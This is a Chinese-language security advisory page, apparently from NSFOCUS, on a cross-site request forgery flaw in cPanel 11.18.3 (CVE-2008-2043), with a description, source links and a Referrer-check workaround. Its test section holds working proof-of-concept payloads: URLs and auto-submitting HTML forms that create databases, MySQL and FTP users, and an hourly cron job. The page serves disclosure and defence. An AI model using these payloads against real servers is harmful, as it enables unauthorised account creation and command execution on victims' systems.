安全研究
安全漏洞
安全漏洞
所有系统
AIX
BSD(eg,OpenBSD)
Digital Unix
HP-UX
IRIX
Linux
FreeBSD
SCO UNIX
SunOS
Solaris
Windows
所有类型
远程进入系统
本地越权访问
拒绝服务攻击
嵌入恶意代码
Web数据接口
其他类型
cPanel跨站请求伪造漏洞
发布日期:
2008-04-28
更新日期:
2008-05-05
受影响系统:
cPanel cPanel 11.18.3 build ID 21703
描述:
CVE(CAN) ID:
CVE-2008-2043
cPanel是基于web的工具,用于自动化控制网站和服务器。
cPanel没有验证用户通过HTTP请求所执行的某些操作,这允许远程攻击者通过跨站请求伪造(XSRF)攻击执行仅有管理员才可以执行的操作,包括创建新的数据库、添加新用户等。
<*来源:Rook Security
链接:
http://secunia.com/advisories/30027/
http://www.kb.cert.org/vuls/id/584089
http://www.rooksecurity.com/blog/?p=7
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
创建数据库:
http://localhost:2082/frontend/x2/sql/adddb.html?db=database_name
创建新的mysql用户:
http://localhost:2082/frontend/x2/sql/adduser.html?user=badmin&pass=badmin
添加ftp用户:
<html>
<form id=1 method=’post’ action=’
http://localhost:2082/frontend/x2/ftp/doaddftp.html’>
<input name=’login’ value=’badmin’>
<input name=’password’ value=’badmin’>
<input name=’quota’ value=’unlimited’>
<input name=’homedir’ value=’/badmin’>
</form>
</html>
<script>
document.getElementById(1).submit();
</script>
每小时运行一次命令行:
<html>
<form id=2 method=’post’ action=’
http://localhost:2082/frontend/x2/cron/editcronsimple.html’>
<input name=’command1′ value=’echo test’>
<input name=’mailto’ value=’junk_address’>
<input name=’minute1′ value=’0′>
<input name=’hour1′ value=’*'>
<input name=’day1′ value=’*'>
<input name=’weekday1′ value=’*'>
<input name=’month1′ value=’*'>
</form>
</html>
<script>
document.getElementById(2).submit();
</script>
建议:
临时解决方法:
* 启用Referrer检查:
1 导航至Server configuration
2 找到Tweak Settings
3 在WebHost Manager中找到Security
4 选择复选框并保存页面
厂商补丁:
cPanel
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.cpanel.net
浏览次数:
2692
严重程度:
0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客